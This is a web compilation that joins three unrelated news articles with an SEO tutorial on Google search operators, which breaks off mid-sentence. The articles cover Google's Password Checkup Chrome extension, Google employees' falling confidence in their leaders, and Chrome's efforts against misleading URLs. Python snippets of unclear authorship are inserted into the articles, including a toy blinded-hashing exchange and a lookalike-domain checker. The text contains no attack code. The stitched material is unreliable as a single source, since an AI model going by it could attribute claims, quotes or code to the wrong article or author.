A Google Chrome Extension Will Save You From Unsafe Passwords

Data breaches that compromise people’s usernames and passwords have become so common, and have been used in crime for so long, that millions of stolen credential pairs have become practically worthless to criminals, circulating online for free. And that doesn’t even begin to scratch the surface of the more current credentials sold on the black market. All of this means that it’s increasingly difficult to keep track of which of your passwords you need to change. So Google has devised a Chrome extension to watch your back.

On Tuesday, the company is announcing “Password Checkup,” which runs in Chrome all the time as you go about your daily web browsing, and checks passwords you enter on all sites against a database of known compromised passwords. Password Checkup isn’t a password manager, a gauge of how weak or strong your passwords are, or a source of advice. It just sits quietly until it detects a credential pair that is known to be exposed, and then it shows a warning. That’s it.

The tool is unobtrusive by design, so you’ll actually pay attention to it when it notices genuine risks. If you’ve been feeling overwhelmed by all the news of data breaches and cybercrime over the past few years, Password Checkup is meant as an easy way to take back some control.

Watchdog

Google accounts tend to be particularly sensitive, because they are often the key to a person’s email address. So the company has already been grappling with notifying users when their Google credentials are compromised—not because Google was hacked but because people reuse passwords on multiple sites.

Google relies on a database of compromised credentials that totals about four billion unique usernames and passwords, gathered from troves its security teams access online as they go about their larger threat detection research for the company. Google says it hasn’t ever bought stolen credentials, and that it doesn’t currently collaborate with other security-minded aggregators like Have I Been Pwned, a service maintained by the security researcher Troy Hunt. The company does accept donations of stolen credentials from researchers, though.

The company already uses that stash to force Google users to abandon exposed passwords. And other Google divisions, like Nest, are working on features to prevent exposed password reuse, because of problems with account takeovers.

“We’ve reset something like 110 million passwords on Google accounts because of massive breaches and other data exposures,” says Elie Bursztein, who leads the anti-abuse research team at Google. “The idea is, can we have a way to do it everywhere? It works in the background and then after 10 seconds you may get a warning that says ‘hey, this is part of a data breach, you should consider changing your password.’ We want it to be 100 percent: if we show it to you, you have to change it.”

Google’s database is always growing, but appears to have some holes. When I tested Password Checkup with a login that I know has been compromised in breaches (so I have one account I haven’t updated yet; what are you gonna do?), it didn’t flag it.

Bursztein and Kurt Thomas, a Google security and anti-abuse research scientist, note that they’ve skewed toward zero false positives, so they aren’t accidentally warning users based on similar but slightly different passwords, or on the same password that was compromised for a different person. And they emphasize that while the company is releasing Password Checkup as a regular Chrome extension for people to start using, it’s still an experiment and isn’t necessarily finalized.

Check Mate

The researchers are anticipating controversy—or “a conversation,” as they often call it—about a crucial question that you may have by now, too: If Password Checkup is running quietly on Chrome all the time with the express goal of monitoring your login credentials, isn’t Google going to end up with a terrifying trove of all your passwords? And if so, couldn’t attackers find a way to compromise Password Checkup to grab tons of current credentials, track you, or infiltrate Google’s database of stolen data?

“There are four threats we had to think about when designing the system,” Thomas says. “The first is that Google never learns your username and password in the process. Another one is we don’t want to tell you about anyone else’s usernames and passwords that don’t belong to you. And we need to prevent somebody from brute forcing the system. We don’t want you to start guessing random usernames and passwords. And the last is we don’t want any sort of trackable identifier for the user that would reveal any information.”

It wouldn’t be feasible on multiple levels for Google to check the credentials without any data leaving the user’s device at all. Instead, the company collaborated with cryptographers at Stanford University to devise layers of encryption and hashing—protective data scrambling—that combine to protect the data as it traverses the internet. First of all, the entire database is scrambled with a hashing function called Argon2, a robust, well-regarded scheme, as a deterrent against an attacker compromising the database or attempting to pull credentials out of the Chrome extension.

Rather than have you download the entire database, the researchers devised a scheme for downloading a smaller subset, or partition, of the data without revealing too much about your specific username and password. When you log into a site, Password Checkup generates a hash of your username and password on your device, and then sends a snippet of it to Google. The system then uses this prefix to create the smaller subset of breached username and password data to download onto your device. “This provides a strong anonymity set where there’s basically hundreds of thousands of usernames and passwords that would fall into that prefix, but we have no idea which they are,” Thomas says. “When you sign in you send that little prefix to Google and we give you every account that we know to download.”
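To make that concrete, here is a minimal sketch of the client side in Python. It is an illustration only: the SHA-256 stand-in (the real system uses the Argon2-based hashing described above), the 2-byte prefix length, and the credentials are all my assumptions, not Google's actual parameters or wire format.

import hashlib

def credential_hash(username: str, password: str) -> bytes:
    # Stand-in hash; the real protocol uses an Argon2-based construction.
    return hashlib.sha256(f"{username}:{password}".encode()).digest()

def lookup_prefix(username: str, password: str, n_bytes: int = 2) -> bytes:
    # The only thing sent to the server: a short, deliberately ambiguous prefix.
    return credential_hash(username, password)[:n_bytes]

# The server returns every breached entry sharing this prefix; the client
# then checks for its own full hash locally, so an exact match never
# leaves the device.
print(lookup_prefix("alice@example.com", "hunter2").hex())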

To index into your subset of the database, your device signs your encrypted username and password with a key only it knows and sends it to Google. Next the company signs it with its own secret key, then sends it back to your device, which decrypts it with its key. After this handshake is complete, the data is finally in the right state of encryption and hashing to do a compatible local lookup on your device against the portion of the database you’ve downloaded. The idea is that everything is encrypted all the time to make the data as indecipherable and useless to a potential attacker—or Google itself—as possible at every phase.
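That commutative "sign, counter-sign, unblind" idea can be illustrated with exponentiation in a prime field, where applying two secret exponents commutes. This is a toy sketch under invented parameters (the modulus, the key generation, and the SHA-256 stand-in for the Argon2-based hash are all mine), not Google's actual protocol.

import hashlib
import math
import secrets

P = 2**255 - 19   # a well-known prime, used here only as a toy group modulus
ORDER = P - 1     # exponents act modulo the multiplicative group order

def hash_to_group(username: str, password: str) -> int:
    # Stand-in for the protocol's Argon2-based hashing.
    d = hashlib.sha256(f"{username}:{password}".encode()).digest()
    return int.from_bytes(d, "big") % P or 1

def random_key() -> int:
    # Keys must be invertible mod ORDER so the blinding can be removed later.
    while True:
        k = secrets.randbelow(ORDER - 2) + 2
        if math.gcd(k, ORDER) == 1:
            return k

client_key, server_key = random_key(), random_key()
x = hash_to_group("alice@example.com", "hunter2")

blinded = pow(x, client_key, P)              # client blinds its credential hash
countersigned = pow(blinded, server_key, P)  # server applies its secret key
unblinded = pow(countersigned, pow(client_key, -1, ORDER), P)  # client unblinds

# The client ends up with its hash under the server's key alone, comparable
# against the server-keyed breach partition it downloaded, while neither
# party ever learns the other's secret.
assert unblinded == pow(x, server_key, P)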

Details Matter

Google plans to release an academic paper about the tool with Stanford researchers that details its underlying protocols and cryptographic principles for public vetting.

When asked about the idea of a browser extension that attempts to monitor passwords in a cryptographically secure and private way, Johns Hopkins cryptographer Matthew Green said, “It’s possible. It could be done securely, I think. I think. But details matter.” Green notes that such a scheme would need to be executed essentially perfectly and would have a number of crucial areas where it could fall short. “If a lot of people will be using it—it’s a little scary, frankly,” he says. And in general, you should only install browser extensions from companies you trust.

With such a desperate need for easily understandable breach information and advice, a lot of people very easily could start using Password Checkup quickly. So it will be incumbent upon Google to actually continue improving the extension’s security based on community feedback—both from users and cryptographers.



Google Employees Report Declining Confidence in Leaders

[Image] Despite an 18-point drop in confidence in Google leadership, employees generally praised CEO Sundar Pichai’s response to a 2016 memo outlining potential cuts in compensation. (Mateusz Wlodarczyk/Getty Images)

Google is a data-obsessed company, but the recent cascade of employee activism can be hard to quantify. How do you take the temperature of a 90,000-person workforce? In November, employees gave Google’s senior leadership an undeniable signal when 20,000 workers walked out of their offices to protest sexual harassment policies. The results of Google’s latest annual survey on employee satisfaction, which were shared internally in January, offer another sign.

Asked whether they have confidence in CEO Sundar Pichai and his management team to “effectively lead in the future,” 74 percent of employees responded “positive,” as opposed to “neutral” or “negative,” in late 2018, down from 92 percent “positive” the year before. The 18-point drop left employee confidence at its lowest point in at least six years. The results of the survey, known internally as Googlegeist, also showed a decline in employees’ satisfaction with their compensation, with 54 percent saying they were satisfied, compared with 64 percent the prior year.

The drop in employee sentiment helps explain why internal debate around compensation, pay equity, and trust in executives has heated up in recent weeks—and why an HR presentation from 2016 went viral inside the company three years later.

The presentation, first reported by Bloomberg and reviewed by WIRED, dates from July 2016, about a year after Google started an internal effort to curb spending. In the slide deck, Google’s human-resources department presents potential ways to cut the company’s $20 billion compensation budget. Ideas include: promoting fewer people, hiring proportionately more low-level employees, and conducting an audit to make sure Google is paying benefits “(only) for the right people.” In some cases, HR suggested ways to implement changes while drawing little attention, or tips on how to sell the changes to Google employees. Some of the suggestions were implemented, like eliminating the annual employee holiday gift; most were not.

Another, more radical proposal floated inside the company around the same time didn’t appear in the deck. That suggested converting some full-time employees to contractors to save money. A person familiar with the situation said this proposal was not implemented. In July, Bloomberg reported that, for the first time, more than 50 percent of Google’s workforce were temps, contractors, and vendors.

The slide deck also includes suggestions for how Google might reinvest some of the savings from these cost cuts, including creating a stand-alone university building in the Bay Area called Google University, hiring more women and minorities, and giving new parents globally 16 weeks parental leave.

A Controversial Company-Wide Meeting

The 2016 presentation, which began circulating inside Google in mid-January, might not have made such an impact with workers if not for executive comments at a company-wide meeting a few days earlier that some employees considered tone-deaf. The meeting was to discuss the Googlegeist results, where managers attempted to put a positive spin on the decline in confidence. Prasad Setty, Google’s vice president of people operations, told the room that dissatisfaction around compensation came from employees who didn’t get promoted and don’t understand how compensation at Google works, according to people familiar with the matter.

The meeting sparked angry commentary about executives on Google’s internal message board for memes, according to employees. Some workers found management’s approach patronizing. One Google employee was frustrated with management’s evasiveness, but wondered if the employee backlash stemmed from the fact that executives were trying to explain individual compensation practices, when activist employees wanted answers to demands for pay equity for contractors, women, and others, first raised during the November walkout.

Once they saw the 2016 memo, employees zeroed in on the suggestion to reduce the number of people promoted by 2 percent—which meant that some qualified people might miss out on promotions because of a cost-cutting strategy they knew nothing about. “They have a deliberate and intentional, well-crafted narrative that they consistently rely on to continue taking advantage of people,” says a Google employee who requested anonymity. “The big lie is that the grueling interview process, performance review process, conversion process—that all of these things exist because we have a meritocratic system of rewards and the bar for excellence is really high.”

At another company-wide meeting a few days later to discuss compensation, Pichai and Setty sought to apologize for the memo and take a more candid approach with employees. Pichai said the document had never crossed his desk and that, if it had, he would have rejected the suggestion about promotions. Following the meeting, employees thanked Pichai for appearing and praised his candor on the internal meme message board.

High Pay, but New Questions

Google is consistently ranked as the best place to work in America. Median pay is $197,000, according to the most recent SEC filings; among the tech giants, only Facebook has a higher median pay. But recent media reports have given employees more information about how Google’s vast resources are allocated. A gender bias lawsuit filed in 2017 claims Google assigned new female hires to lower levels and denied them promotions. The November walkout was prompted by a New York Times report that Android founder Andy Rubin received a $90 million exit package, even after a sexual harassment complaint the company found credible.

The disclosure about contractors also rankled. Popular perception, even within Google, is that contractors are hired for service or nontechnical roles. But inside Alphabet, Google’s parent company, contractors work as engineers and recruiters, and even manage teams, Bloomberg reported. Anna, a contractor in Mountain View who requested to use only her first name, told WIRED that she doesn’t fit the image Google would like to project. She acts as a liaison between Google and outside vendors and says she is “paid really well.” Still, she does not have access to health care benefits or time off and she can’t attend parties for launches that she helped prepare. Perry, who conducted user research for Google in Seattle until his contract ended last week, said that managers may not know how much money contract workers are taking home.

Some of Google’s well-paid staffers, including organizers of the Google walkout, have been trying to draw more attention to practices they find exploitative, especially for a company that posted $21.8 billion in profit in the first nine months of last year. Their concerns echo the larger political movement around inequality, which has focused on tech titans and how their business practices have concentrated wealth in the hands of a few, even within their own companies.

The secrecy around compensation at Google has been a flashpoint before. In 2015, Erica Joy Baker, then an engineer at Google, started a spreadsheet for employees to share their salaries, as a way to combat the “chilling effect” that comes from discouraging employees from talking about their pay. Since the latest survey results were announced, employees have been adding their salaries to Baker’s spreadsheet, which is still active; meanwhile, contractors have been sharing their benefits and pay to compare agency practices.

Despite the overall good reviews, Pichai disappointed some employees with his answers on contractors. Asked why Google has contractors struggling to live in the Bay Area while he himself makes hundreds of millions, Pichai said it was a cost of living issue beyond Google’s control.

“They could totally afford to pay people a living wage,” Stephanie Parker, who works in policy at YouTube, told WIRED. “They’ve said multiple times, ‘We’re leading the market, what we do other companies follow.’ OK, then pay your people. Other companies will follow.”



Google Takes Its First Steps Toward Killing the URL

In September, members of Google’s Chrome security team put forth a radical proposal: Kill off URLs as we know them. The researchers aren’t actually advocating a change to the web’s underlying infrastructure. They do, though, want to rework how browsers convey what website you’re looking at, so that you don’t have to contend with increasingly long and unintelligible URLs—and the fraud that has sprung up around them. In a talk at the Bay Area Enigma security conference on Tuesday, Chrome usable security lead Emily Stark is wading into the controversy, detailing Google’s first steps toward more robust website identity.

Stark emphasizes that Google isn’t trying to induce chaos by eliminating URLs. Rather, it wants to make it harder for hackers to capitalize on user confusion about the identity of a website. Currently, the endless haze of complicated URLs gives attackers cover for effective scams. They can create a malicious link that seems to lead to a legitimate site, but actually automatically redirects victims to a phishing page. Or they can design malicious pages with URLs that look similar to real ones, hoping victims won’t notice that they’re on G00gle rather than Google. With so many URL shenanigans to combat, the Chrome team is already at work on two projects aimed at bringing users some clarity.

“What we’re really talking about is changing the way site identity is presented,” Stark told WIRED. “People should know easily what site they’re on, and they shouldn’t be confused into thinking they’re on another site. It shouldn’t take advanced knowledge of how the internet works to figure that out.”

“A key challenge is avoiding flagging legitimate domains as suspicious.”

Emily Stark, Google Chrome

The Chrome team’s efforts so far focus on figuring out how to detect and warn users about URLs that seem to deviate in some way from standard practice. The foundation for this is an open source tool called TrickURI, launching in step with Stark’s conference talk, that collects both legitimate and sneaky URL samples to train machine learning algorithms about potentially phishy sites. The goal is to give developers—particularly browser developers—something to test against if they want to start adding suspicious URL detection and warning mechanisms into their software. Building on that foundation, Stark and her colleagues are also working to create warnings for Chrome users, and testing them with TrickURI.

For Google users, the first line of defense against phishing and other online scams is still the company’s Safe Browsing platform. But the Chrome team is exploring complements to Safe Browsing that specifically focus on flagging sketchy URLs.


“Our heuristics for detecting misleading URLs involve comparing characters that look similar to each other and domains that vary from each other just by a small number of characters,” Stark says. “Our goal is to develop a set of heuristics that pushes attackers away from extremely misleading URLs, and a key challenge is avoiding flagging legitimate domains as suspicious. This is why we’re launching this warning slowly, as an experiment.”
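As a toy illustration of those two checks (canonicalizing lookalike characters, then measuring edit distance against known-good domains), here is a sketch in Python. The confusables map, the one-edit threshold, and the domain list are invented for illustration; the real detection is machine-learning driven (trained with tools like TrickURI) and far more involved.

# Tiny sample of visually confusable characters; real maps are much larger.
CONFUSABLE = str.maketrans("0135", "oles")
LEGIT = {"google.com", "paypal.com", "wired.com"}

def canonical(domain: str) -> str:
    return domain.lower().translate(CONFUSABLE)

def edit_distance(a: str, b: str) -> int:
    # Classic dynamic-programming Levenshtein distance.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[-1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def looks_suspicious(domain: str) -> bool:
    d = canonical(domain)
    for legit in LEGIT:
        if domain.lower() == legit:
            return False  # the genuine domain itself
        if d == legit or edit_distance(d, legit) <= 1:
            return True   # a confusable twin, or one edit away
    return False

print(looks_suspicious("g00gle.com"))   # True
print(looks_suspicious("example.com"))  # False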

Google says it hasn’t started rolling out the warnings to the general user population while the Chrome team refines those detection capabilities. And while URLs may not be going anywhere anytime soon, Stark emphasizes that there is more in the works on how to get users to focus on important parts of URLs and to refine how Chrome presents them. The big challenge is showing people the parts of URLs that are relevant to their security and online decision-making, while somehow filtering out all the extra components that make URLs hard to read. Browsers also sometimes need to help users with the opposite problem, by expanding shortened or truncated URLs.

“The whole space is really challenging because URLs work really well for certain people and use cases right now, and lots of people love them,” Stark says. “We’re excited about the progress that we’ve made with our new open source URL display ‘TrickURI’ tool and our exploratory new warnings on confusable URLs.”

The Chrome security team has taken on internet-wide security issues before, developing fixes for them in Chrome and then throwing Google’s weight around to motivate everyone to adopt the practice. The strategy was particularly successful over the last five years in stimulating a movement toward universal adoption of HTTPS web encryption. But critics of the approach fear the drawbacks of Chrome’s power and ubiquity. The same influence that has been used for positive change could be misdirected or abused. And with something as foundational as URLs, critics fear that the Chrome team could land on website identity display tactics that are good for Chrome, but don’t actually benefit the rest of the web. Even seemingly minor changes to Chrome’s privacy and security posture can have major impacts on the web community.

Additionally, a tradeoff of that ubiquity is being beholden to risk-averse corporate customers. “URLs as they work now are often unable to convey a risk level users can quickly identify,” says Katie Moussouris, founder of the responsible vulnerability disclosure firm Luta Security. “But as Chrome grows in enterprise adoption, rather than the consumer space, their ability to radically change visible interfaces and underlying security architecture will be reduced by the pressure of their customers. Great popularity comes not only with great responsibility to keep people safe, but to minimize churn in features, usability, and backwards compatibility.”

If it all sounds like a lot of confusing and frustrating work, that’s exactly the point. The next question will be how the Chrome team’s new ideas perform in practice, and whether they really wind up making you safer on the web.



Google Search Operators: The Complete List (42 Advanced Operators)

For anyone who’s been doing SEO for a while, Google advanced search operators—i.e., special commands that make regular ol’ searches seem laughably basic in comparison—are nothing new.

Here’s a Google search operator you may be familiar with.

[Image: the “site:” operator restricts results to only those from a specified site.]

It’s easy to remember most search operators. They’re short commands that stick in the mind.

But knowing how to use them effectively is an altogether different story.

Most SEOs know the basics, but few have truly mastered them.

In this post, I’ll share 15 actionable tips to help you master search operators for SEO, which are:

  1. Find indexation errors
  2. Find non‐secure pages (non‐https)
  3. Find duplicate content issues
  4. Find unwanted files and pages on your site
  5. Find guest post opportunities
  6. Find resource page opportunities
  7. Find sites that feature infographics… so you can pitch YOURS
  8. Find more link prospects… AND check how relevant they are
  9. Find social profiles for outreach prospects
  10. Find internal linking opportunities
  11. Find PR opportunities by finding competitor mentions
  12. Find sponsored post opportunities
  13. Find Q+A threads related to your content
  14. Find how often your competitors are publishing new content
  15. Find sites linking to competitors

But first, here’s a complete list of all Google search operators and their functionality.

Google Search Operators: The Complete List

Did you know that Google is constantly killing useful operators?

That’s why most existing lists of Google search operators are outdated and inaccurate.

For this post, I personally tested EVERY search operator I could find.

Here is a complete list of all working, non‐working, and “hit and miss” Google advanced search operators as of 2018.

Working Operators

“search term”

Force an exact‐match search. Use this to refine results for ambiguous searches, or to exclude synonyms when searching for single words.

Example: “steve jobs”

OR

Search for X or Y. This will return results related to X or Y, or both. Note: The pipe (|) operator can also be used in place of “OR.”

Examples: jobs OR gates / jobs | gates

AND

Search for X and Y. This will return only results related to both X and Y. Note: It doesn’t really make much difference for regular searches, as Google defaults to “AND” anyway. But it’s very useful when paired with other operators.

Example: jobs AND gates

-

Exclude a term or phrase. In our example, any pages returned will be related to jobs but not Apple (the company).

Example: jobs -apple

*

Acts as a wildcard and will match any word or phrase.

Example: steve * apple 

( )

Group multiple terms or search operators to control how the search is executed.

Example: (ipad OR iphone) apple

$

Search for prices. Also works for Euro (€), but not GBP (£) 🙁

Example: ipad $329

define:

A dictionary built into Google, basically. This will display the meaning of a word in a card‐like result in the SERPs.

Example: define:entrepreneur

cache:

Returns the most recent cached version of a web page (providing the page is indexed, of course).

Example: cache:apple.com

filetype:

Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The “ext:” operator can also be used—the results are identical.

Example: apple filetype:pdf / apple ext:pdf

site:

Limit results to those from a specific website.

Example: site:apple.com

related:

Find sites related to a given domain.

Example: related:apple.com

intitle:

Find pages with a certain word (or words) in the title. In our example, any results containing the word “apple” in the title tag will be returned.

Example: intitle:apple

allintitle:

Similar to “intitle,” but only results containing all of the specified words in the title tag will be returned.

Example: allintitle:apple iphone

inurl:

Find pages with a certain word (or words) in the URL. For this example, any results containing the word “apple” in the URL will be returned.

Example: inurl:apple

allinurl:

Similar to “inurl,” but only results containing all of the specified words in the URL will be returned.

Example: allinurl:apple iphone

intext:

Find pages containing a certain word (or words) somewhere in the content. For this example, any results containing the word “apple” in the page content will be returned.

Example: intext:apple

allintext:

Similar to “intext,” but only results containing all of the specified words somewhere on the page will be returned.

Example: allintext:apple iphone

AROUND(X)

Proximity search. Find pages containing two words or phrases within X words of each other. For this example, the words “apple” and “iphone” must be present in the content and no further than four words apart.

Example: apple AROUND(4) iphone

weather:

Find the weather for a specific location. This is displayed in a weather snippet, but it also returns results from other “weather” websites.

Example: weather:san francisco

stocks:

See stock information (i.e., price, etc.) for a specific ticker.

Example: stocks:aapl

map:

Force Google to show map results for a locational search.

Example: map:silicon valley

movie:

Find information about a specific movie. Also finds movie showtimes if the movie is currently showing near you.

Example: movie:steve jobs

in

Convert one unit to another. Works with currencies, weights, temperatures, etc.

Example: $329 in GBP

source:

Find news results from a certain source in Google News.

Example: apple source:the_verge

_

Not exactly a search operator, but acts as a wildcard for Google Autocomplete.

Example: apple CEO _ jobs

Hit-and-Miss Operators

Here are the ones that are hit and miss, according to my testing:

#..#

Search for a range of numbers. In the example below, searches related to “WWDC videos” are returned for the years 2010–2014, but not for 2015 and beyond.

Example: wwdc video 2010..2014

inanchor:

Find pages that are being linked to with specific anchor text. For this example, any results with inbound links containing either “apple” or “iphone” in the anchor text will be returned.

Example: inanchor:apple iphone

allinanchor:

Similar to “inanchor,” but only results containing all of the specified words in the inbound anchor text will be returned.

Example: allinanchor:apple iphone

blogurl:

Find blog URLs under a specific domain. This was used in Google blog search, but I’ve found it does return some results in regular search.

Example: blogurl:microsoft.com

Sidenote.

Google blog search was discontinued in 2011.

loc:placename

Find results from a given area.

Example: loc:”san francisco” apple

Sidenote.

Not officially deprecated, but results are inconsistent.

location:

Find news from a certain location in Google News.

Example: location:”san francisco” apple

Sidenote.

Not officially deprecated, but results are inconsistent.

Discontinued Operators

Here are the Google search operators that have been discontinued and no longer work. 🙁

+

Force an exact‐match search on a single word or phrase.

Example: jobs +apple

Sidenote.

You can do the same thing by using double quotes around your search.

~

Include synonyms. Doesn’t work, because Google now includes synonyms by default. (Hint: Use double quotes to exclude synonyms.)

Example: ~apple

inpostauthor:

Find blog posts written by a specific author. This only worked in Google Blog search, not regular Google search.

Example: inpostauthor:”steve jobs”

Sidenote.

Google blog search was discontinued in 2011.

allinpostauthor:

Similar to “inpostauthor,” but removes the need for quotes (if you want to search for a specific author, including surname).

Example: allinpostauthor:steve jobs

inposttitle:

Find blog posts with specific words in the title. No longer works, as this operator was unique to the discontinued Google blog search.

Example: inposttitle:apple iphone

link:

Find pages linking to a specific domain or URL. Google killed this operator in 2017, but it does still show some results—they likely aren’t particularly accurate though.

Example: link:apple.com

info:

Find information about a specific page, including the most recent cache, similar pages, etc. (Deprecated in 2017). Note: The id: operator can also be used—the results are identical.

Sidenote.

Although the original functionality of this operator is deprecated, it is still useful for finding the canonical, indexed version of a URL. Thanks to @glenngabe for pointing this one out!

Example: info:apple.com / id:apple.com

daterange:

Find results from a certain date range. Uses the Julian date format, for some reason.

Example: daterange:11278-13278

Sidenote.

Not officially deprecated, but doesn’t seem to work.

phonebook:

Find someone’s phone number. (Deprecated in 2010)

Example: phonebook:tim cook

#

Searches #hashtags. Introduced for Google+; now deprecated.

Example: #apple

15 Actionable Ways to Use Google Search Operators

Now let’s tackle a few ways to put these operators into action.

My aim here is to show that you can achieve almost anything with Google advanced operators if you know how to use and combine them efficiently.

So don’t be afraid to play around and deviate from the examples below. You might just discover something new.

Let’s go!

1. Find indexation errors

Google indexation errors exist for most sites.

It could be that a page that should be indexed, isn’t. Or vice‐versa.

Let’s use the site: operator to see how many pages Google has indexed for ahrefs.com.

[Image: results count for a site:ahrefs.com search]

~1,040.

But how many of these pages are blog posts?

Let’s find out.

[Image: results count for a site:ahrefs.com/blog search]

~249. That’s roughly ¼.

I know Ahrefs blog inside out, so I know this is higher than the number of posts we have.

Let’s investigate further.

[Image: odd, non-post pages appearing in the blog’s indexed results]

OK, so it seems that a few odd pages are being indexed.

(This page isn’t even live—it’s a 404)

Such pages should be removed from the SERPs by noindexing them.

Let’s also narrow the search to subdomains and see what we find.

[Image: a site: search using the wildcard (*) operator to surface Ahrefs subdomains, excluding www results]

Sidenote.

Here, we’re using the wildcard (*) operator to find all subdomains belonging to the domain, combined with the exclusion operator (-) to exclude regular www results.

~731 results.

Here’s a page residing on a subdomain that definitely shouldn’t be indexed. It gives a 404 error for a start.

[Image: a 404 page on an Ahrefs subdomain appearing in Google’s index]

Here are a few other ways to uncover indexation errors with Google operators:

  • site:yourblog.com/category — find WordPress blog category pages;
  • site:yourblog.com inurl:tag — find WordPress “tag” pages.

2. Find non‐secure pages (non‐https)

HTTPS is a must these days, especially for ecommerce sites.

But did you know that you can find unsecure pages with the site: operator?

Let’s try it for asos.com.

[Image: a site:asos.com search restricted to non-https pages]

Oh my, ~2.47M unsecure pages.

It looks like ASOS doesn’t currently use SSL—unbelievable for such a large site.

[Image: unsecure (http) ASOS pages in Google’s index]

Sidenote.

Don’t worry, Asos customers—their checkout pages are secure 🙂

But here’s another crazy thing:

ASOS is accessible at both the https and http versions.

[Image: ASOS loading over both the http and https versions]

And we learned all that from a simple site: search!

Sidenote.

I’ve noticed that sometimes, when using this tactic, pages will be indexed without the https. But when you click through, you will be directed to the https version. So don’t assume that your pages are unsecure just because they appear as such in Google’s index. Always click a few of them to double‐check.

3. Find duplicate content issues

Duplicate content = bad.

Here’s a pair of Abercrombie and Fitch jeans from ASOS with this brand description:

[Image: an Abercrombie & Fitch brand description on an ASOS product page]

With third‐party brand descriptions like this, they’re often duplicated on other sites.

But first, I’m wondering how many times this copy appears on asos.com.

[Image: an exact-match search showing the copy appears ~4.2K times on asos.com]

~4.2K.

Now I’m wondering if this copy is even unique to ASOS.

Let’s check.

[Image: an exact-match search for the copy, excluding asos.com]

No, it isn’t.

That’s 15 other sites with this exact same copy—i.e., duplicate content.
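If you run this check often, a tiny helper makes the query reusable. This is my own convenience function, not something from the article, and the excerpt below is a placeholder rather than ASOS's actual copy.

def duplication_query(excerpt: str, own_domain: str = "", exclude_word: str = "") -> str:
    # Exact-match the excerpt; optionally exclude your own site and a noisy word.
    parts = ['"' + excerpt + '"']
    if own_domain:
        parts.append("-site:" + own_domain)
    if exclude_word:
        parts.append("-" + exclude_word)
    return " ".join(parts)

print(duplication_query("a distinctive snippet of the brand description",
                        own_domain="asos.com"))
# "a distinctive snippet of the brand description" -site:asos.com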

Sometimes duplicate content issues can arise from similar product pages, too.

For example, similar or identical products with different quantity counts.

Here’s an example from ASOS:

[Image: near-identical ASOS sock product pages differing only by quantity]

You can see that—quantities aside—all of these product pages are the same.

But duplicate content isn’t only a problem for ecommerce sites.

If you have a blog, then people could be stealing and republishing your content without attribution.

Let’s see if anyone has stolen and republished our list of SEO tips.

[Image: an exact-match search for our SEO tips post, excluding ahrefs.com and “pinterest”]

~17 results.

Sidenote.

You’ll notice that I excluded ahrefs.com from the results using the exclusion (-) operator—this ensures that the original doesn’t appear in the search results. I also excluded the word “pinterest.” This was because I saw a lot of Pinterest results for this search, which aren’t really relevant to what we’re looking for. I could have excluded just pinterest.com (-pinterest.com), but as Pinterest has many ccTLDs, this didn’t really help things. Excluding the word “pinterest” was the best way to clean up the results.

Most of these are probably syndicated content.

Still, it’s worth checking these out to make sure that they do link back to you.

Find stolen content in seconds

Content Explorer > In title > enter the title of your page/post > exclude your own site

[Image: a Content Explorer “In title” search for the post title, excluding ahrefs.com]

You will then see any pages (from our database of 900M+ pieces of content) with the same title as your page/post.

In this instance, there are 5 results.

[Image: 5 results in Content Explorer]

Next, enter your domain under “Highlight unlinked domains.”

This will highlight any sites that don’t link back to you.

[Image: the “Highlight unlinked domains” option in Content Explorer]

You can then reach out to those sites and request the addition of a source link.

FYI, this filter actually looks for links on a domain‐level rather than a page‐level. It is, therefore, possible that the site could be linking to you from another page, rather than the page in question.

4. Find odd files on your domain (that you may have forgotten about)

Keeping track of everything on your website can be difficult.

(This is especially true for big sites.)

For this reason, it’s easy to forget about old files you may have uploaded.

PDF files; Word documents; Powerpoint presentations; text files; etc.

Let’s use the filetype: operator to check for these on ahrefs.com.

[Image: a site:ahrefs.com filetype:pdf search]

Sidenote.

Remember, you can also use the ext: operator—it does the same thing.

Here’s one of those files:

[Image: a PDF file indexed on ahrefs.com]

I’ve never seen that piece of content before. Have you?

But we can extend this further than just PDF files.

By combining a few operators, it’s possible to return results for all supported file types at once.

[Image: combining several filetype: operators with OR to return all supported file types at once]

Sidenote.

The filetype operator does also support things like .asp, .php, .html, etc.
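If you'd rather not type that long OR chain by hand, a small helper (my own, not from the article) assembles it for any domain:

FILETYPES = ["pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt"]

def filetype_query(domain: str, filetypes=FILETYPES) -> str:
    # One filetype: clause per extension, joined with OR and scoped to the domain.
    ors = " OR ".join("filetype:" + ft for ft in filetypes)
    return "site:" + domain + " (" + ors + ")"

print(filetype_query("ahrefs.com"))
# site:ahrefs.com (filetype:pdf OR filetype:doc OR ... OR filetype:txt)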

It’s important to delete or noindex these if you’d prefer people didn’t come across them.

5. Find guest post opportunities

Guest post opportunities… there are TONS of ways to find them, such as:

[Image: a “write for us” + niche keyword search]

But you already knew about that method, right!? 😉

Sidenote.

For those who haven’t seen this one before, it uncovers so‐called “write for us” pages in your niche—the pages many sites create when they’re actively seeking guest contributions.

So let’s get more creative.

First off: don’t limit yourself to “write for us.”

You can also use:

  • “become a contributor”
  • “contribute to”
  • “write for me” (yep—there are solo bloggers seeking guest posts, too!)
  • “guest post guidelines”
  • inurl:guest-post
  • inurl:guest-contributor-guidelines
  • etc.

But here’s a cool tip most people miss:

You can search for many of these at once.

[Image: searching several guest-post footprints at once]

Sidenote.

Did you notice I’m using the pipe (“|”) operator instead of “OR” this time? Remember, it does the same thing. 🙂

You can even search for multiple footprints AND multiple keywords.

[Image: combining multiple footprints and multiple keywords in one search]
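For reference, the combined searches look something like this (my reconstruction of the queries shown in the screenshots, with SEO as a stand-in niche):

Example: SEO (“write for us” | “become a contributor” | “guest post guidelines”)

Example: (SEO | “link building”) (“write for us” | “guest post guidelines”)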

Looking for opportunities in a specific country?

Just add a site:.tld operator.

[Image: the same search restricted to a specific country with a site:.tld operator]

Here’s another method:

If you know of a serial guest blogger in your niche, try this:

[Image: finding every site a serial guest blogger has written for, using intext: for their name and inurl:author]

This will find every site that person has written for.

Sidenote.

Don’t forget to exclude their site to keep the results clean!

How to find even more author guest posts

Content Explorer > author search > exclude their site(s)

For this example, let’s use our very own Tim Soulo.

[Image: a Content Explorer author: search for Tim Soulo]

BOOM. 17 results. All of which are probably guest posts.

For reference, here’s the exact search I entered into Content Explorer:

